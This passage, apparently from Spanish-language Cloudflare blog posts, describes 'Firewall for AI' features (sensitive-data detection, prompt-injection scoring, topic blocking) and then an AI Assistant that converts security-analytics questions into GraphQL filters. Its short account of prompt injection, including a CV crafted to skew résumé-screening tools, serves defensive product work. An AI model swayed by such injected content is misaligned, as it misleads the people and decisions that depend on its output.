Según define OWASP, la divulgación de información confidencial se produce cuando los LLM revelan inadvertidamente datos confidenciales en las respuestas, lo que causa el acceso a datos no autorizados, violaciones de la privacidad y fallos de seguridad. Una forma de evitarlo es añadir estrictas validaciones de las instrucciones. Otra estrategia es identificar la información de identificación personal que sale del modelo. Esto es relevante, por ejemplo, cuando se ha entrenado un modelo con una base de conocimiento de una empresa que puede incluir información confidencial, como información de identificación personal (p. ej., números de la seguridad social), código privado o algoritmos.

Los clientes que utilizan modelos LLM detrás del WAF de Cloudflare pueden emplear el conjunto de reglas administradas del WAF de detección de datos confidenciales para identificar determinada información de identificación personal que devuelva el modelo en la respuesta. Los clientes pueden revisar las coincidencias de detección de datos confidenciales en los eventos de seguridad del WAF. Hoy, la detección de datos confidenciales se ofrece como un conjunto de reglas administradas diseñadas para analizar la información financiera (por ejemplo, números de tarjeta de crédito) así como secretos (claves de API). Como parte de la hoja de ruta, tenemos previsto permitir que nuestros clientes creen sus propias huellas digitales personalizadas.

El otro caso de uso tiene como objetivo evitar que los usuarios compartan información de identificación personal u otra información confidencial con proveedores de LLM externos, como OpenAI o Anthropic. Para estar protegidos ante esta situación, tenemos previsto ampliar la detección de datos confidenciales para analizar la instrucción de la solicitud e integrar su resultado con AI Gateway, donde, junto con el historial de la instrucción, detectamos si se han incluido determinada información confidencial en la solicitud. Empezaremos utilizando las reglas de detección de datos confidenciales y tenemos previsto permitir que los clientes escriban sus propias firmas personalizadas. De la misma forma, la ofuscación es otra función que nos comentan muchos de nuestros clientes. Cuando esté disponible, la detección de datos confidenciales ampliada permitirá que los clientes ofusquen determinados datos confidenciales en una instrucción antes de que estos lleguen al modelo. La detección de datos confidenciales en la fase de solicitud está en desarrollo.

El abuso de modelos es una categoría más amplia de abuso. Incluye estrategias como la "inyección de instrucciones" o el envío de solicitudes que generan alucinaciones o causan respuestas imprecisas, ofensivas, inadecuadas o simplemente no relacionadas con el tema.

La inyección de instrucciones es un intento de manipular un modelo de lenguaje mediante entradas elaboradas especialmente, que causan que el LLM devuelva respuestas no deseadas. Los resultados de una inyección pueden variar, desde extraer información confidencial a influenciar la toma de decisiones imitando las interacciones normales con el modelo. Un ejemplo clásico de inyección de instrucciones es manipular un CV para afectar al resultado de las herramientas de cribado de currículums.

Un caso de uso común que nos comentan los clientes de nuestra solución AI Gateway es que quieren evitar que su aplicación genere lenguaje tóxico, ofensivo o problemático. Los riesgos de no controlar el resultado del modelo incluyen daños a la reputación y perjudicar al usuario final proporcionando una respuesta no fiable.

Podemos abordar estos tipos de abuso añadiendo una capa adicional de protección delante del modelo. Esta capa se puede entrenar para bloquear los intentos de inyección o para bloquear los intentos correspondientes a las categorías inapropiadas.

Firewall for AI ejecutará una serie de detecciones diseñadas para identificar los intentos de inyección de instrucciones y otros tipos de abuso, por ejemplo, garantizando que el tema se mantiene dentro de los límites que ha definido el propietario del modelo. Al igual que otras funciones existentes del WAF, Firewall for AI buscará automáticamente las instrucciones incorporadas en las solicitudes HTTP o permitirá a los clientes crear reglas según la ubicación del cuerpo JSON de la solicitud donde se puede encontrar la instrucción.

Una vez activado, el firewall analizará cada instrucción y proporcionará una puntuación según la probabilidad de que esta sea maliciosa. También etiquetará la instrucción según las categorías predefinidas. La puntuación va de 1 a 99 e indica la probabilidad de una inyección de instrucción, donde 1 es la probabilidad más alta.

Los clientes podrán crear reglas de WAF para bloquear o manejar las solicitudes con una puntuación determinada en una o en ambas de estas dimensiones. Podrás combinar esta puntuación con otros indicadores existentes (como la puntuación de bots o la puntuación de ataques) para determinar si la solicitud debe llegar al modelo o se debe bloquear. Por ejemplo, se podría combinar con una puntuación de bots para identificar si la solicitud era maliciosa y la ha generado una fuente automatizada.

La detección de las inyecciones de instrucciones y del abuso de instrucciones forman parte del ámbito de Firewall for AI. Iteración temprana del diseño del producto.

Además de la puntuación, asignaremos etiquetas a cada instrucción, que se pueden utilizar al crear reglas para impedir que las instrucciones correspondientes a cualquiera de estas categorías lleguen a su modelo. Por ejemplo, los clientes podrán crear reglas para bloquear temas específicos. Esto incluye las instrucciones que utilicen palabras categorizadas como ofensivas, o vinculadas a la religión, a contenido sexual o a la política, por ejemplo.

Los clientes del plan Enterprise en la solución de seguridad avanzada para aplicaciones pueden empezar ya a utilizar la limitación de velocidad avanzada y la detección de datos confidenciales (en la fase de respuesta). Ambos productos se pueden encontrar en la sección del WAF del panel de control de Cloudflare. La función de validación de instrucciones de Firewall for AI está actualmente en desarrollo y lanzaremos una versión beta en los próximos meses para todos los usuarios de Workers AI. Inscríbete en la lista de espera y te avisaremos cuando la función esté disponible.

Cloudflare es uno de los primeros proveedores de seguridad que lanza un conjunto de herramientas para proteger las aplicaciones de IA. Con Firewall for AI, los clientes pueden controlar qué instrucciones y solicitudes llegan a sus modelos de lenguaje, reduciendo el riesgo de abusos y la exfiltración de datos. Sigue atento para saber más sobre la evolución de la seguridad para las aplicaciones de IA.

Hoy anunciamos un asistente de IA que te ayudará a consultar tus datos relacionados con los eventos de seguridad, con el que podrás descubrir más rápido las anomalías y los potenciales ataques a la seguridad. Ahora puedes utilizar el lenguaje natural para realizar preguntas a los análisis de Cloudflare y nosotros nos encargamos del resto.

Una de las mayores dificultades al analizar un pico de tráfico o cualquier anomalía de tu tráfico es crear los filtros para aislar la causa del problema. Esto implica saber manejar paneles de control y herramientas a menudo complejos, y saber dónde hacer clic y qué filtrar.

Además, lo que te puede ofrecer cualquier panel de control de seguridad tradicional se ve limitado por cómo estén almacenados tus datos, cómo estén indexadas las bases de datos y qué campos se permitan al crear los filtros. Con nuestra vista de los análisis de seguridad, por ejemplo, era difícil comparar series temporales con distintas características. Por ejemplo, no podías comparar el tráfico de la dirección IP x.x.x.x con el tráfico automatizado de Alemania sin abrir varias pestañas de los análisis de seguridad y filtrarlas por separado. Desde una perspectiva de la ingeniería, sería sumamente complicado desarrollar un sistema que permitiera estos tipos de comparaciones sin restricciones.

Con AI Assistant, eliminamos esta complejidad utilizando nuestra plataforma Workers AI para desarrollar una herramienta que puede ayudarte a consultar tu solicitud HTTP y tus datos de eventos de seguridad, así como a generar gráficos de series temporales basados en una solicitud elaborada con lenguaje natural. Ahora AI Assistant se ocupa de la compleja tarea de averiguar cuáles son los filtros necesarios, y también puede representar varias series de datos en un solo gráfico para facilitar las comparaciones. Esto ofrece nuevas posibilidades de examinar los datos y los registros, sin las restricciones de los paneles de control tradicionales.

Ahora es más fácil que nunca obtener datos eficaces sobre la seguridad de tus aplicaciones utilizando lenguaje natural para consultar tus datos y comprender mejor cómo Cloudflare protege tu negocio. El nuevo AI Assistant se encuentra en el panel de control de análisis de seguridad y funciona de manera eficaz con los filtros existentes. Obtén las respuestas que necesitas con una simple pregunta.

Para demostrar las funcionalidades de AI Assistant, hemos empezado considerando las preguntas que nos planteamos nosotros mismos a diario cuando ayudamos a los clientes a implementar las mejores soluciones de seguridad para sus aplicaciones.

Para ayudarte a empezar, hemos incluido en el panel de control algunos ejemplos en los que puedes hacer clic.

Con AI Assistant puedes:

• Identificar la fuente de un pico del tráfico de ataques. Pregunta: "Compare attack traffic between US and UK" (Compara el tráfico de ataques entre EE. UU. y el Reino Unido).

• Identificar la causa de errores 5xx. Pregunta: "Compare origin and edge 5xx errors” (Compara los errores 5XX en el origen y en el perímetro).

• Ver qué navegadores utilizan tus usuarios más habitualmente. Pregunta: "Compare traffic across major web browsers" (Compara el tráfico de los principales navegadores web).

• Comprender qué porcentaje de usuarios visitan vs. añaden artículos a su carrito de compra (en un sitio de comercio electrónico). Pregunta: "Compare traffic between /api/login and /api/basket" (Compara el tráfico entre /api/login y /api/basket).

• Identificar los ataques de bots contra tu sitio de comercio electrónico. Pregunta: “Show requests to /api/basket with a bot score less than 20" (Muestra las solicitudes enviadas a /api/basket con una puntuación de bots inferior a 20).

• Identificar las versiones de HTTP que utilizan los clientes. Pregunta: "Compare traffic by each HTTP version" (Compara el tráfico de cada versión de HTTP).

• Identificar el tráfico automatizado no deseado a puntos finales específicos. Pregunta: “Show POST requests to /admin with a Bot Score over 30" (Muestra las solicitudes POST a /admin con una puntuación de bots superior a 30).

Puedes empezar a explorar AI Assistant con estas preguntas.

Con la potente plataforma de inferencia de red global de Cloudflare Workers AI, hemos podido utilizar uno de los modelos de lenguaje de gran tamaño listos para usar que ofrece la plataforma para convertir las consultas de los clientes en filtros GraphQL. Enseñando a un modelo de IA los filtros disponibles que tenemos en nuestro conjunto de datos GraphQL de análisis de seguridad, podemos conseguir que el modelo de IA convierta una solicitud como "Compare attack traffic on /api and /admin endpoints" (Compara el tráfico de ataques en los puntos finales /api y /admin) en un conjunto coincidente de filtros estructurados:

A continuación, utilizando los filtros que proporciona el modelo de IA, podemos realizar solicitudes a nuestras API GraphQL, recopilar los datos necesarios y representar una visualización de datos que responda a la consulta del cliente.

```
[
  {“name”: “Attack Traffic on /api”, “filters”: [{“key”: “clientRequestPath”, “operator”: “eq”, “value”: “/api”}, {“key”: “wafAttackScoreClass”, “operator”: “eq”, “value”: “attack”}]},
  {“name”: “Attack Traffic on /admin”, “filters”: [{“key”: “clientRequestPath”, “operator”: “eq”, “value”: “/admin”}, {“key”: “wafAttackScoreClass”, “operator”: “eq”, “value”: “attack”}]}
]
```

Mediante este método, podemos garantizar la privacidad de la información de los clientes y evitar exponer los datos de los análisis de seguridad al propio modelo de IA, al mismo tiempo que los usuarios humanos pueden consultar sus datos fácilmente. Esto garantiza que tus consultas nunca se utilizarán para entrenar el modelo. Puesto que Workers AI aloja una instancia local del modelo de lenguaje de gran tamaño en la propia red de Cloudflare, tus consultas y los datos resultantes nunca saldrán de la red de Cloudflare.

Estamos en las primeras etapas del desarrollo de esta funcionalidad, y tenemos previsto ampliar rápidamente las funciones de AI Assistant para los análisis de seguridad. No te sorprenda que al principio no podamos manejar algunas de tus solicitudes. En el momento de su lanzamiento, podemos admitir consultas básicas, como "show me" (muéstrame) o "compare" (compara), que se pueden representar en un gráfico de series temporales para cualquier campo que actualmente admita filtros.

Sin embargo, somos conscientes de que hay una serie de casos de uso en los que ni siquiera hemos pensado, pero nos complace lanzar la versión Beta de AI Assistant para todos los clientes de los planes Business y Enterprise para que puedan probar esta función y ver lo que pueden hacer con ella. Nos encantaría conocer tu opinión y saber más sobre lo que te parece útil y lo que te gustaría ver a continuación. Con las futuras versiones, podrás realizar preguntas como "Did I experience any attacks yesterday?" (¿Sufrí ayer algún ataque?) y utilizar la IA para generar automáticamente reglas de WAF que puedas aplicar para mitigar estos ataques.

A partir de hoy, AI Assistant está disponible para algunos usuarios, y se implementará en todos los clientes de los planes Business y Enterprise a lo largo del mes de marzo. Sigue atento y pruébalo gratis. Dinos qué te parece mediante el enlace Comentarios en la parte superior de la página de análisis de seguridad.

El precio definitivo se determinará antes de la disponibilidad general.